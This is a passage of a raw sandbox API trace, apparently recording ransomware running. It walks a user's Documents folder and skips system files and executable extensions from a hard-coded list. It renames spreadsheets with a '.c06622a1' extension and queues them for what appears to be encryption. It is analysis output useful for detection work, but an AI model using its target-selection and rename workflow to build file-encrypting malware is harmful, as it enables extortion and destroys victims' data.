Seed=0xf51018 | out: Seed=0xf51018) returned 0x3ecda6c1 [0148.885] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7df89963 [0148.885] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5020c1b1 [0148.885] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4f4b0e8a [0148.885] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x42d7c3cb [0148.885] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7c8cd390 [0148.888] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x48b0094, Length=0x80) returned 0xc94172ec [0148.888] RtlComputeCrc32 (PartialCrc=0x72ec, Buffer=0x48b0094, Length=0x80) returned 0xeb77af7c [0148.888] RtlComputeCrc32 (PartialCrc=0xaf7c, Buffer=0x48b0094, Length=0x80) returned 0x47b77d86 [0148.888] RtlComputeCrc32 (PartialCrc=0x7d86, Buffer=0x48b0094, Length=0x80) returned 0x1ab44d67 [0148.888] RtlComputeCrc32 (PartialCrc=0x4d67, Buffer=0x48b0094, Length=0x80) returned 0x71b96d3b [0148.888] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0148.888] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.888] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.888] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0148.888] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0148.888] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0148.888] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0148.888] wcslen (_String="autorun.inf") returned 0xb [0148.888] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0148.888] wcslen (_String="boot.ini") returned 0x8 [0148.888] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0148.888] wcslen (_String="bootfont.bin") returned 0xc [0148.888] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0148.889] wcslen (_String="bootsect.bak") returned 0xc [0148.889] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0148.889] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57459dc0, ftCreationTime.dwHighDateTime=0x1d5e232, ftLastAccessTime.dwLowDateTime=0x6f73e550, ftLastAccessTime.dwHighDateTime=0x1d57ebe, ftLastWriteTime.dwLowDateTime=0x6f73e550, ftLastWriteTime.dwHighDateTime=0x1d57ebe, nFileSizeHigh=0x0, nFileSizeLow=0x1170b, dwReserved0=0x0, dwReserved1=0x0, cFileName="ELXseSjd-063nXffKC.xlsx", cAlternateFileName="ELXSES~1.XLS")) returned 1 [0148.889] _wcsicmp (_Str1="ELXseSjd-063nXffKC.xlsx", _Str2="README.c06622a1.TXT") returned -13 [0148.889] wcsstr (_Str="ELXseSjd-063nXffKC.xlsx", _SubStr="README") returned 0x0 [0148.889] _wcsicmp (_Str1="autorun.inf", _Str2="ELXseSjd-063nXffKC.xlsx") returned -4 [0148.889] wcslen (_String="autorun.inf") returned 0xb [0148.889] _wcsicmp (_Str1="boot.ini", _Str2="ELXseSjd-063nXffKC.xlsx") returned -3 [0148.889] wcslen (_String="boot.ini") returned 0x8 [0148.889] _wcsicmp (_Str1="bootfont.bin", _Str2="ELXseSjd-063nXffKC.xlsx") returned -3 [0148.889] wcslen (_String="bootfont.bin") returned 0xc [0148.889] _wcsicmp (_Str1="bootsect.bak", _Str2="ELXseSjd-063nXffKC.xlsx") returned -3 [0148.889] wcslen (_String="bootsect.bak") returned 0xc [0148.889] _wcsicmp (_Str1="desktop.ini", _Str2="ELXseSjd-063nXffKC.xlsx") returned -1 [0148.889] wcslen (_String="desktop.ini") returned 0xb [0148.889] _wcsicmp (_Str1="iconcache.db", _Str2="ELXseSjd-063nXffKC.xlsx") returned 4 [0148.889] wcslen (_String="iconcache.db") returned 0xc [0148.889] _wcsicmp (_Str1="ntldr", _Str2="ELXseSjd-063nXffKC.xlsx") returned 9 [0148.889] wcslen (_String="ntldr") returned 0x5 [0148.889] _wcsicmp (_Str1="ntuser.dat", _Str2="ELXseSjd-063nXffKC.xlsx") returned 9 [0148.889] wcslen (_String="ntuser.dat") returned 0xa [0148.889] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ELXseSjd-063nXffKC.xlsx") returned 9 [0148.889] wcslen (_String="ntuser.dat.log") returned 0xe [0148.889] _wcsicmp (_Str1="ntuser.ini", _Str2="ELXseSjd-063nXffKC.xlsx") returned 9 [0148.889] wcslen (_String="ntuser.ini") returned 0xa [0148.889] _wcsicmp (_Str1="thumbs.db", _Str2="ELXseSjd-063nXffKC.xlsx") returned 15 [0148.889] wcslen (_String="thumbs.db") returned 0x9 [0148.889] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0148.889] wcslen (_String="386") returned 0x3 [0148.889] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0148.889] wcslen (_String="adv") returned 0x3 [0148.889] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0148.889] wcslen (_String="ani") returned 0x3 [0148.889] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0148.889] wcslen (_String="bat") returned 0x3 [0148.889] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0148.889] wcslen (_String="bin") returned 0x3 [0148.890] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0148.890] wcslen (_String="cab") returned 0x3 [0148.890] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0148.890] wcslen (_String="cmd") returned 0x3 [0148.890] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0148.890] wcslen (_String="com") returned 0x3 [0148.890] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0148.890] wcslen (_String="cpl") returned 0x3 [0148.890] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0148.890] wcslen (_String="cur") returned 0x3 [0148.890] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0148.890] wcslen (_String="deskthemepack") returned 0xd [0148.890] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0148.890] wcslen (_String="diagcab") returned 0x7 [0148.890] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0148.890] wcslen (_String="diagcfg") returned 0x7 [0148.890] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0148.890] wcslen (_String="diagpkg") returned 0x7 [0148.890] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0148.890] wcslen (_String="dll") returned 0x3 [0148.890] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0148.890] wcslen (_String="drv") returned 0x3 [0148.890] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0148.890] wcslen (_String="exe") returned 0x3 [0148.890] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0148.890] wcslen (_String="hlp") returned 0x3 [0148.890] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0148.890] wcslen (_String="icl") returned 0x3 [0148.890] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0148.890] wcslen (_String="icns") returned 0x4 [0148.890] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0148.890] wcslen (_String="ico") returned 0x3 [0148.890] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0148.890] wcslen (_String="ics") returned 0x3 [0148.890] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0148.890] wcslen (_String="idx") returned 0x3 [0148.890] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0148.890] wcslen (_String="ldf") returned 0x3 [0148.890] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0148.891] wcslen (_String="lnk") returned 0x3 [0148.891] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0148.891] wcslen (_String="mod") returned 0x3 [0148.891] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0148.891] wcslen (_String="mpa") returned 0x3 [0148.891] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0148.891] wcslen (_String="msc") returned 0x3 [0148.891] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0148.891] wcslen (_String="msp") returned 0x3 [0148.891] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0148.891] wcslen (_String="msstyles") returned 0x8 [0148.891] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0148.891] wcslen (_String="msu") returned 0x3 [0148.891] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0148.891] wcslen (_String="nls") returned 0x3 [0148.891] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0148.891] wcslen (_String="nomedia") returned 0x7 [0148.891] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0148.891] wcslen (_String="ocx") returned 0x3 [0148.891] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0148.891] wcslen (_String="prf") returned 0x3 [0148.891] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0148.891] wcslen (_String="ps1") returned 0x3 [0148.891] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0148.891] wcslen (_String="rom") returned 0x3 [0148.891] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0148.891] wcslen (_String="rtp") returned 0x3 [0148.891] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0148.891] wcslen (_String="scr") returned 0x3 [0148.891] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0148.891] wcslen (_String="shs") returned 0x3 [0148.891] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0148.891] wcslen (_String="spl") returned 0x3 [0148.891] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0148.891] wcslen (_String="sys") returned 0x3 [0148.891] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0148.891] wcslen (_String="theme") returned 0x5 [0148.891] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0148.892] wcslen (_String="themepack") returned 0x9 [0148.892] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0148.892] wcslen (_String="wpx") returned 0x3 [0148.892] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0148.892] wcslen (_String="lock") returned 0x4 [0148.892] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0148.892] wcslen (_String="key") returned 0x3 [0148.892] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0148.892] wcslen (_String="hta") returned 0x3 [0148.892] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0148.892] wcslen (_String="msi") returned 0x3 [0148.892] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0148.892] wcslen (_String="pdb") returned 0x3 [0148.892] _wcsicmp (_Str1="sql", _Str2="xlsx") returned -5 [0148.892] wcslen (_String="sql") returned 0x3 [0148.892] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0148.892] wcslen (_String="sqlite") returned 0x6 [0148.892] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0148.892] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.892] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0148.892] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0148.892] wcscpy (in: _Dest=0x44d00d0, _Source="ELXseSjd-063nXffKC.xlsx" | out: _Dest="ELXseSjd-063nXffKC.xlsx") returned="ELXseSjd-063nXffKC.xlsx" [0148.892] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ELXseSjd-063nXffKC.xlsx", dwFileAttributes=0x80) returned 1 [0148.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ELXseSjd-063nXffKC.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\elxsesjd-063nxffkc.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0148.893] SetFilePointerEx (in: hFile=0x670, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.893] ReadFile (in: hFile=0x670, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.893] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x4a678c07 [0148.893] RtlComputeCrc32 (PartialCrc=0x8c07, Buffer=0x3feb74, Length=0x80) returned 0xde349b6e [0148.893] RtlComputeCrc32 (PartialCrc=0x9b6e, Buffer=0x3feb74, Length=0x80) returned 0x1a5f1585 [0148.893] RtlComputeCrc32 (PartialCrc=0x1585, Buffer=0x3feb74, Length=0x80) returned 0x894177e1 [0148.893] RtlComputeCrc32 (PartialCrc=0x77e1, Buffer=0x3feb74, Length=0x80) returned 0x2aba3df [0148.894] CloseHandle (hObject=0x670) returned 1 [0148.894] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.894] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ELXseSjd-063nXffKC.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ELXseSjd-063nXffKC.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ELXseSjd-063nXffKC.xlsx" [0148.894] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ELXseSjd-063nXffKC.xlsx") returned 0x43 [0148.894] wcscpy (in: _Dest=0x44e0106, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.894] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ELXseSjd-063nXffKC.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\elxsesjd-063nxffkc.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ELXseSjd-063nXffKC.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\elxsesjd-063nxffkc.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0148.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ELXseSjd-063nXffKC.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\elxsesjd-063nxffkc.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x670 [0148.896] CreateIoCompletionPort (FileHandle=0x670, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.896] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4940020 [0148.902] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1b2490e5 [0148.902] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4ee4b252 [0148.902] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x29c977f [0148.902] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x13789b2c [0148.902] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x58670923 [0148.902] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x15c32181 [0148.902] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x25bcb71c [0148.902] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x176dcfa6 [0148.905] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4940094, Length=0x80) returned 0x358dda79 [0148.905] RtlComputeCrc32 (PartialCrc=0xda79, Buffer=0x4940094, Length=0x80) returned 0xc5042bc3 [0148.905] RtlComputeCrc32 (PartialCrc=0x2bc3, Buffer=0x4940094, Length=0x80) returned 0x19586b51 [0148.905] RtlComputeCrc32 (PartialCrc=0x6b51, Buffer=0x4940094, Length=0x80) returned 0xb77701e3 [0148.905] RtlComputeCrc32 (PartialCrc=0x1e3, Buffer=0x4940094, Length=0x80) returned 0xa0bb28a9 [0148.905] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0148.905] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.905] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.906] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9afff840, ftCreationTime.dwHighDateTime=0x1d5c6e3, ftLastAccessTime.dwLowDateTime=0xe1cd55e0, ftLastAccessTime.dwHighDateTime=0x1d5d617, ftLastWriteTime.dwLowDateTime=0xe1cd55e0, ftLastWriteTime.dwHighDateTime=0x1d5d617, nFileSizeHigh=0x0, nFileSizeLow=0x139a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD9PK85B_zpq.xlsx", cAlternateFileName="FD9PK8~1.XLS")) returned 1 [0148.906] _wcsicmp (_Str1="FD9PK85B_zpq.xlsx", _Str2="README.c06622a1.TXT") returned -12 [0148.906] wcsstr (_Str="FD9PK85B_zpq.xlsx", _SubStr="README") returned 0x0 [0148.906] _wcsicmp (_Str1="autorun.inf", _Str2="FD9PK85B_zpq.xlsx") returned -5 [0148.906] wcslen (_String="autorun.inf") returned 0xb [0148.906] _wcsicmp (_Str1="boot.ini", _Str2="FD9PK85B_zpq.xlsx") returned -4 [0148.906] wcslen (_String="boot.ini") returned 0x8 [0148.906] _wcsicmp (_Str1="bootfont.bin", _Str2="FD9PK85B_zpq.xlsx") returned -4 [0148.906] wcslen (_String="bootfont.bin") returned 0xc [0148.906] _wcsicmp (_Str1="bootsect.bak", _Str2="FD9PK85B_zpq.xlsx") returned -4 [0148.906] wcslen (_String="bootsect.bak") returned 0xc [0148.906] _wcsicmp (_Str1="desktop.ini", _Str2="FD9PK85B_zpq.xlsx") returned -2 [0148.906] wcslen (_String="desktop.ini") returned 0xb [0148.906] _wcsicmp (_Str1="iconcache.db", _Str2="FD9PK85B_zpq.xlsx") returned 3 [0148.906] wcslen (_String="iconcache.db") returned 0xc [0148.906] _wcsicmp (_Str1="ntldr", _Str2="FD9PK85B_zpq.xlsx") returned 8 [0148.906] wcslen (_String="ntldr") returned 0x5 [0148.906] _wcsicmp (_Str1="ntuser.dat", _Str2="FD9PK85B_zpq.xlsx") returned 8 [0148.906] wcslen (_String="ntuser.dat") returned 0xa [0148.906] _wcsicmp (_Str1="ntuser.dat.log", _Str2="FD9PK85B_zpq.xlsx") returned 8 [0148.906] wcslen (_String="ntuser.dat.log") returned 0xe [0148.906] _wcsicmp (_Str1="ntuser.ini", _Str2="FD9PK85B_zpq.xlsx") returned 8 [0148.906] wcslen (_String="ntuser.ini") returned 0xa [0148.906] _wcsicmp (_Str1="thumbs.db", _Str2="FD9PK85B_zpq.xlsx") returned 14 [0148.906] wcslen (_String="thumbs.db") returned 0x9 [0148.906] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0148.906] wcslen (_String="386") returned 0x3 [0148.906] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0148.906] wcslen (_String="adv") returned 0x3 [0148.906] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0148.906] wcslen (_String="ani") returned 0x3 [0148.906] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0148.906] wcslen (_String="bat") returned 0x3 [0148.906] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0148.906] wcslen (_String="bin") returned 0x3 [0148.906] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0148.907] wcslen (_String="cab") returned 0x3 [0148.907] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0148.907] wcslen (_String="cmd") returned 0x3 [0148.907] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0148.907] wcslen (_String="com") returned 0x3 [0148.907] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0148.907] wcslen (_String="cpl") returned 0x3 [0148.907] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0148.907] wcslen (_String="cur") returned 0x3 [0148.907] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0148.907] wcslen (_String="deskthemepack") returned 0xd [0148.907] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0148.907] wcslen (_String="diagcab") returned 0x7 [0148.907] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0148.907] wcslen (_String="diagcfg") returned 0x7 [0148.907] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0148.907] wcslen (_String="diagpkg") returned 0x7 [0148.907] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0148.907] wcslen (_String="dll") returned 0x3 [0148.907] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0148.907] wcslen (_String="drv") returned 0x3 [0148.907] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0148.907] wcslen (_String="exe") returned 0x3 [0148.907] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0148.907] wcslen (_String="hlp") returned 0x3 [0148.907] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0148.907] wcslen (_String="icl") returned 0x3 [0148.907] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0148.907] wcslen (_String="icns") returned 0x4 [0148.907] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0148.907] wcslen (_String="ico") returned 0x3 [0148.907] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0148.907] wcslen (_String="ics") returned 0x3 [0148.907] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0148.907] wcslen (_String="idx") returned 0x3 [0148.907] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0148.907] wcslen (_String="ldf") returned 0x3 [0148.907] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0148.907] wcslen (_String="lnk") returned 0x3 [0148.908] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0148.908] wcslen (_String="mod") returned 0x3 [0148.908] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0148.908] wcslen (_String="mpa") returned 0x3 [0148.908] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0148.908] wcslen (_String="msc") returned 0x3 [0148.908] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0148.908] wcslen (_String="msp") returned 0x3 [0148.908] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0148.908] wcslen (_String="msstyles") returned 0x8 [0148.908] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0148.908] wcslen (_String="msu") returned 0x3 [0148.908] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0148.908] wcslen (_String="nls") returned 0x3 [0148.908] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0148.908] wcslen (_String="nomedia") returned 0x7 [0148.908] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0148.908] wcslen (_String="ocx") returned 0x3 [0148.908] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0148.908] wcslen (_String="prf") returned 0x3 [0148.908] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0148.908] wcslen (_String="ps1") returned 0x3 [0148.908] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0148.908] wcslen (_String="rom") returned 0x3 [0148.908] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0148.908] wcslen (_String="rtp") returned 0x3 [0148.908] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0148.908] wcslen (_String="scr") returned 0x3 [0148.908] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0148.908] wcslen (_String="shs") returned 0x3 [0148.908] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0148.908] wcslen (_String="spl") returned 0x3 [0148.908] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0148.908] wcslen (_String="sys") returned 0x3 [0148.908] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0148.908] wcslen (_String="theme") returned 0x5 [0148.908] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0148.908] wcslen (_String="themepack") returned 0x9 [0148.909] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0148.909] wcslen (_String="wpx") returned 0x3 [0148.909] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0148.909] wcslen (_String="lock") returned 0x4 [0148.909] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0148.909] wcslen (_String="key") returned 0x3 [0148.909] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0148.909] wcslen (_String="hta") returned 0x3 [0148.909] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0148.909] wcslen (_String="msi") returned 0x3 [0148.909] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0148.909] wcslen (_String="pdb") returned 0x3 [0148.909] _wcsicmp (_Str1="sql", _Str2="xlsx") returned -5 [0148.909] wcslen (_String="sql") returned 0x3 [0148.909] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0148.909] wcslen (_String="sqlite") returned 0x6 [0148.909] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0148.909] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.909] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0148.909] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0148.909] wcscpy (in: _Dest=0x44d00d0, _Source="FD9PK85B_zpq.xlsx" | out: _Dest="FD9PK85B_zpq.xlsx") returned="FD9PK85B_zpq.xlsx" [0148.909] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FD9PK85B_zpq.xlsx", dwFileAttributes=0x80) returned 1 [0148.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FD9PK85B_zpq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fd9pk85b_zpq.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0148.910] SetFilePointerEx (in: hFile=0x638, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.910] ReadFile (in: hFile=0x638, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, 